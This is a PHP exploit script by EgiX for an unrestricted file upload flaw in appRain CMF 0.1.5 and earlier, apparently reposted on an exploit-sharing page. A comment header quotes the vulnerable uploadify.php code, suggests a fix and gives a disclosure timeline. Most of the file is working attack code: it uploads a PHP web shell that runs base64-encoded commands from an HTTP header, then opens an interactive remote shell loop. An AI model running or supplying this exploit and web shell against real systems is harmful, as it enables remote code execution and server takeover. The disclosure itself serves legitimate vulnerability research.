扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 |
<?php /* --------------------------------------------------------------------- appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit --------------------------------------------------------------------- author............: Egidio Romano aka EgiX mail..............: n0b0d13s[at]gmail[dot]com software link.....: http://www.apprain.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only.| | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] vulnerable code in /webroot/addons/uploadify/uploadify.php 27.if (!empty($_FILES)) { 28.$tempFile = $_FILES['Filedata']['tmp_name']; 29.//$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/'; 30.$targetFile ="uploads/" . $_FILES['Filedata']['name']; 31. 32.// $fileTypes= str_replace('*.','',$_REQUEST['fileext']); 33.// $fileTypes= str_replace(';','|',$fileTypes); 34.// $typesArray = split('\|',$fileTypes); 35.// $fileParts= pathinfo($_FILES['Filedata']['name']); 36. 37.// if (in_array($fileParts['extension'],$typesArray)) { 38.// Uncomment the following line if you want to make the directory if it doesn't exist 39.// mkdir(str_replace('//','/',$targetPath), 0755, true); 40. 41.move_uploaded_file($tempFile,$targetFile); 42.echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile); 43.// } else { 44.//echo 'Invalid file type.'; 45.// } 46.} Restricted access tothis script isn't properly realized,so an attacker mightbe able to upload arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked. [-] Possible bug fix: include_once('../../../app.php'); App::__Obj('appRain_Base_Core')->check_admin_login(); add this lines of code at the beginning of the script [-] Disclosure timeline: [19/12/2011] - Vulnerability discovered [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135 [20/12/2011] - Vendor response and fix suggested [16/01/2012] - After four weeks still no fix released [19/01/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------------------------------+"; print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |"; print "\n+---------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /apprain-v015/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload= "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet= "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n"); $packet= "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\napprain-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?> |
体验盒子
